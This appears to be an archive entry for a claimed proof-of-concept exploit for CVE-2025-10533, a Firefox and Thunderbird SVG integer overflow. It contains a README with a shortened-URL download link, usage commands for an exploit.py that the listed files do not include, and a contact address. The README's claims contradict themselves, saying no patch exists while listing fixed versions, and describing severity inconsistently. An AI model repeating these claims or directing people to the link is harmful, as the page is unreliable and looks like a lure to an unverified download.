PoC details: 662fc1155356b3bd3ec0555aa7e6819a9e8fc24c

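Source
Related vulnerability
Title: Mozilla Firefox and Mozilla Thunderbird security vulnerability (CVE-2025-10533)
Description: Mozilla Firefox and Mozilla Thunderbird are both products of the Mozilla Foundation (USA). Mozilla Firefox is an open-source web browser. Mozilla Thunderbird is an email client that was split out of the Mozilla Application Suite; it supports the IMAP and POP mail protocols as well as HTML mail. Mozilla Firefox and Mozilla Thunderbird contain a security vulnerability caused by an integer overflow in the SVG component.
Introduction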
# CVE-2025-10533-Exploit
# Overview 
An integer overflow or wraparound vulnerability affecting Mozilla Firefox and Thunderbird browser products. The vulnerability impacts multiple versions of Firefox and Firefox ESR, potentially allowing attackers to exploit system vulnerabilities through network-based attacks.
## Exploit:
### [Download here](https://tinyurl.com/2rb2fn4j)
## Details
+ **CVE ID**: CVE-2025-10533
+ **Published**: 09/16/2025
+ **Impact**: Critical
+ **Exploit Availability**: Not public, only private.
+ **CVSS**: 8.8
+ **Patch Available**: No official patch yet
## Impact
Attackers with low-privilege network access could potentially:
- Compromise system confidentiality by accessing sensitive information
- Modify system integrity
- Disrupt system availability

The vulnerability has a high severity with a CVSS score of 8.8, indicating significant potential for system compromise without requiring user interaction.
## Usage 
  1. Execute `exploit.py`:
     ```bash
     python exploit.py --config config.json
     ```
  2. Use `--verbose` for detailed output:
     ```bash
     python exploit.py --config config.json --verbose
     ```
## Affected Versions
Firefox < 143, Firefox ESR < 115.28, Firefox ESR < 140.3, Thunderbird < 143, and Thunderbird < 140.3.
# Demo
- `demo.mp4`: A 5-minute video demonstrating the setup, configuration, and execution of the PoC.

## Contact
+ **For inquiries, please contact: f0kinn@outlook.com**

File snapshot

[4.0K] /data/pocs/662fc1155356b3bd3ec0555aa7e6819a9e8fc24c
└── [1.4K] README.md

0 directories, 1 file